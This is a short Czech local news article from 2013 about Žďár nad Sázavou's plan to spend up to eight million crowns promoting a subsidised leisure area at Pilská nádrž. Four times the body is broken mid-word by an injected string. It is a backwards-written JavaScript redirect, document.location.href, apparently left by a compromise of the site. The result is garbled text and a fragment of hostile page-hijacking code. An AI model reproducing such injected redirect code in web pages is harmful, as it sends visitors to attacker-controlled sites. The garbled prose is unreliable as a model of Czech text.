Žďár nad Sázavou, aktuality, Pilská nádrž, propagace
Rainbow page separator

Na propagaci Pilské nádrže padnou miliony

Pondělí, 12. srpna 2013

Žďár nad Sázavou / Propagaci připravovaného projektu revitalizace okolí Pilské nádrže, kde vznikne moderní areál pro trávení volného času, připravuje žďárská radnice. Na financování té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to reklamy má přispět evropská dotace, o kterou měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to požádalo.pilska-nadrz-300x225 Žďárští radní na předfinancování projektu Poznej aktivně Žďársko schválili nejvýše osm milionů korun z rozpočtu města.

V případě, že se jim kýženou dotaci podaří získat, prezentace volnočasového areálu u Pilské nádrže bude probíhat nejenom v kraji a v republice, ale i v zahraničí. Konkrétně se bude jednat o dvacet tisíc sad propagačních materiálů a mediální informační kampaň.

Už za rok má být u Pilské nádrže na ploše 50 tisíc metrů čtverečních vybudováno několik hřišť včetně jednoho s umělým povrchem, s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tolní tenis, minigolf, discgolfový areál či instalovány posilovací stroje. U vody bude stát nová půjčovna loděk, šlapadel a spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovních potřeb, nedaleko pak amfiteátr pro konání společenských akcí, chybět nebude občerstvení, posezení a cesty pro pěší. První stavební práce budou zahájeny do konce prázdnin.

Na přestavbu areálu u Pilské nádrže a současně na úpravu okolí kostela na Zelené hoře získali Žďárští evropskou dotaci ve výši bezmála 23 milionů korun, celkové náklady vyjdou asi na třicet milionů.